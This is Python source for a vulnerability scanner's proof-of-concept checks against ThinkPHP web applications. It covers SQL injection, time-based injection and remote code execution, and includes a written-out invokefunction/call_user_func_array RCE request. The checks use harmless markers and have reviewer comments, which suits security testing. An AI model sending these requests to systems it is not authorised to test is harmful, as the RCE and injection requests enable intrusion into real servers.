async def thinkphp_view_recent_xff_sqli_verify(url):
    """Send one GET built from the module-level ``payload`` and report the outcome.

    Returns the dict produced by ``get_pocdict``. When the marker string is
    found in the response body, the dict is flagged ``isvul`` and carries the
    probed URL, the marker and the raw body. Any exception is stored as text
    under ``exception`` rather than raised.

    NOTE: the HTTP call is not awaited, so it runs synchronously and blocks
    the event loop until the request completes or the 15 s timeout fires.
    """
    marker = '56540676a129760a'
    report = get_pocdict(vulnname=__name__)
    try:
        probe_url = urljoin(url, payload)
        # verify=False skips TLS certificate validation, so the reply is not
        # authenticated as coming from the intended host.
        reply = requests.get(probe_url, headers=headers, timeout=15, verify=False)
        if marker in reply.text:
            report['isvul'] = True
            report['vulnurl'] = probe_url
            report['proof'] = marker
            # Raw body from the scanned host: treat as untrusted when it is
            # later rendered or stored.
            report['response'] = reply.text
    except Exception as err:
        report['exception'] = str(err)
    return report
async def thinkphp_index_construct_rce_verify(url):
    """POST the module-level ``payload`` to ``index.php?s=index/index/index``.

    Returns the dict produced by ``get_pocdict``. If the marker string appears
    in the response body, the dict is flagged ``isvul`` and records the
    endpoint, the payload, the marker and the raw body. Exceptions are stored
    as text under ``exception`` rather than raised.

    NOTE: the HTTP call is not awaited, so it runs synchronously and blocks
    the event loop until the request completes or the 15 s timeout fires.
    """
    marker = '4e5e5d7364f443e28fbf0d3ae744a59a'
    report = get_pocdict(vulnname=__name__)
    try:
        endpoint = urljoin(url, 'index.php?s=index/index/index')
        # verify=False skips TLS certificate validation, so the reply is not
        # authenticated as coming from the intended host.
        reply = requests.post(endpoint, data=payload, headers=headers, timeout=15, verify=False)
        if marker in reply.text:
            report['isvul'] = True
            report['vulnurl'] = endpoint
            report['payload'] = payload
            report['proof'] = marker
            # Raw body from the scanned host: treat as untrusted downstream.
            report['response'] = reply.text
    except Exception as err:
        report['exception'] = str(err)
    return report
async def thinkphp_construct_debug_rce_verify(url):
    """POST the module-level ``payload`` to ``index.php`` under ``url``.

    Returns the dict produced by ``get_pocdict``. If the marker string appears
    in the response body, the dict is flagged ``isvul`` and records the
    endpoint, the payload, the marker and the raw body. Exceptions are stored
    as text under ``exception`` rather than raised.

    NOTE: the HTTP call is not awaited, so it runs synchronously and blocks
    the event loop until the request completes or the 15 s timeout fires.
    """
    marker = '56540676a129760a3'
    report = get_pocdict(vulnname=__name__)
    try:
        endpoint = urljoin(url, 'index.php')
        # verify=False skips TLS certificate validation, so the reply is not
        # authenticated as coming from the intended host.
        reply = requests.post(endpoint, data=payload, headers=headers, timeout=15, verify=False)
        if marker in reply.text:
            report['isvul'] = True
            report['vulnurl'] = endpoint
            report['payload'] = payload
            report['proof'] = marker
            # Raw body from the scanned host: treat as untrusted downstream.
            report['response'] = reply.text
    except Exception as err:
        report['exception'] = str(err)
    return report
async def thinkphp_index_showid_rce_verify(url):
    """Run a two-request check: GET ``payload1``, then GET a dated ``payload2``.

    The first response is discarded. The second URL is built by formatting the
    module-level ``payload2`` with today's date as ``yy_mm_dd``. Only the second
    body is searched for the marker. On a hit, the returned dict is flagged
    ``isvul`` and records the *first* URL, a proof string and the second body.
    Exceptions are stored as text under ``exception`` rather than raised.

    NOTE: neither HTTP call is awaited, so both run synchronously and block
    the event loop for up to 15 s each.
    """
    report = get_pocdict(vulnname=__name__)
    try:
        first_url = urljoin(url, payload1)
        # verify=False skips TLS certificate validation on both requests.
        requests.get(first_url, headers=headers, timeout=15, verify=False)
        # NOTE(review): the date comes from the scanner's local clock. If the
        # target's clock or timezone differs, payload2 may name another day,
        # which would give a false negative. Confirm.
        stamp = datetime.datetime.now().strftime("%Y_%m_%d")[2:]
        second_url = urljoin(url, payload2.format(stamp))
        reply = requests.get(url=second_url, headers=headers, timeout=15, verify=False)
        if '56540676a129760a3' in reply.text:
            report['isvul'] = True
            report['vulnurl'] = first_url
            report['proof'] = '56540676a129760a3 found'
            # Raw body from the scanned host: treat as untrusted downstream.
            report['response'] = reply.text
    except Exception as err:
        report['exception'] = str(err)
    return report
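async def thinkphp_multi_sql_leak_verify(url):
    """GET each path in the module-level ``payloads`` and report one result per path.

    Returns a list of dicts from ``get_pocdict``, one per payload. A result is
    flagged ``isvul`` when the literal text ``SQL syntax`` appears in the
    response body, and then records the probed URL, a proof string and the raw
    body. A failed request stores the exception text under ``exception`` in
    that payload's dict; the remaining payloads are still tried.

    NOTE: the HTTP calls are not awaited, so each runs synchronously and
    blocks the event loop for up to 15 s.
    """
    results = []
    for payload in payloads:
        # Fresh dict per payload. A single shared dict would let a later
        # probe overwrite an earlier probe's findings.
        pocdict = get_pocdict(vulnname=__name__)
        try:
            vurl = urljoin(url, payload)
            # verify=False skips TLS certificate validation, so the reply is
            # not authenticated as coming from the intended host.
            resp = requests.get(vurl, headers=headers, timeout=15, verify=False)
            # Plain substring match: a page that legitimately contains the
            # phrase is also flagged, so a hit needs manual confirmation.
            if 'SQL syntax' in resp.text:
                pocdict['isvul'] = True
                pocdict['vulnurl'] = vurl
                pocdict['proof'] = 'SQL syntax found'
                # Body may hold database error details. Treat it as sensitive
                # and untrusted when stored or rendered.
                pocdict['response'] = resp.text
        except Exception as e:
            pocdict['exception'] = str(e)
        results.append(pocdict)
    return results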
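async def thinkphp_checkcode_time_sqli_verify(url):
    """POST the module-level ``payload`` to the checkcode endpoint and time the reply.

    Returns the dict produced by ``get_pocdict``. The dict is flagged ``isvul``
    when the request takes at least 8 seconds, and then records the endpoint,
    the payload, a proof string and the raw body. Exceptions, including the
    15 s timeout, are stored as text under ``exception`` rather than raised.

    NOTE: the HTTP call is not awaited, so it runs synchronously and blocks
    the event loop for the whole (deliberately slow) request.
    """
    pocdict = get_pocdict(vulnname=__name__)
    try:
        url = urljoin(url, 'index.php?s=/home/user/checkcode/')
        # Use the monotonic clock for the interval: time.time() can jump when
        # the system clock is adjusted (e.g. by NTP), which would corrupt the
        # measurement.
        start_time = time.monotonic()
        # verify=False skips TLS certificate validation, so the reply is not
        # authenticated as coming from the intended host.
        resp = requests.post(url, data=payload, headers=headers, timeout=15, verify=False)
        elapsed = time.monotonic() - start_time
        # One slow response is weak evidence: a loaded server or slow network
        # can also exceed 8 s. Treat a hit as a candidate to re-check against
        # a baseline request, not as confirmation.
        if elapsed >= 8:
            pocdict['isvul'] = True
            pocdict['vulnurl'] = url
            pocdict['payload'] = payload
            pocdict['proof'] = 'time sleep 8'
            # Raw body from the scanned host: treat as untrusted downstream.
            pocdict['response'] = resp.text
    except Exception as e:
        pocdict['exception'] = str(e)
    return pocdict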
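async def thinkphp_invoke_func_code_exec_verify(url):
    """Check each discovered controller name with the invokefunction request.

    The page at ``url`` is fetched and searched with the module-level
    ``pattern``. The second ``/``-separated segment of every match is taken as
    a controller name, in addition to the default ``index``. One request is
    made per distinct controller, and one ``get_pocdict`` dict per request is
    returned in a list. A result is flagged ``isvul`` when the marker string
    appears in the body.

    If the discovery request or match parsing fails, a single result carrying
    the exception text is returned, in the same way the per-controller probes
    record their errors, and no further requests are sent.

    NOTE: the HTTP calls are not awaited, so each runs synchronously and
    blocks the event loop for up to 15 s.
    """
    results, controllers = [], ['index']
    try:
        # verify=False skips TLS certificate validation on every request here.
        resp = requests.get(url, headers=headers, timeout=15, verify=False)
        for match in re.findall(pattern, resp.text):
            parts = match.split('/')
            # The names come from the target's own response, so skip matches
            # with no second segment instead of raising IndexError.
            if len(parts) > 1 and parts[1]:
                controllers.append(parts[1])
    except Exception as e:
        pocdict = get_pocdict(vulnname=__name__)
        pocdict['exception'] = str(e)
        results.append(pocdict)
        return results
    # dict.fromkeys removes duplicates and keeps discovery order, so the
    # result list is reproducible between runs.
    for controller in dict.fromkeys(controllers):
        pocdict = get_pocdict(vulnname=__name__)
        try:
            payload = f'index.php?s={controller}/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2333'
            vurl = urljoin(url, payload)
            resp = requests.get(vurl, headers=headers, timeout=15, verify=False)
            # The request asks for md5 of 2333. The marker is presumably the
            # leading characters of that digest. TODO confirm.
            if '56540676a129760a3' in resp.text:
                pocdict['isvul'] = True
                pocdict['vulnurl'] = vurl
                pocdict['proof'] = '56540676a129760a3'
                # Raw body from the scanned host: treat as untrusted downstream.
                pocdict['response'] = resp.text
        except Exception as e:
            pocdict['exception'] = str(e)
        results.append(pocdict)
    return results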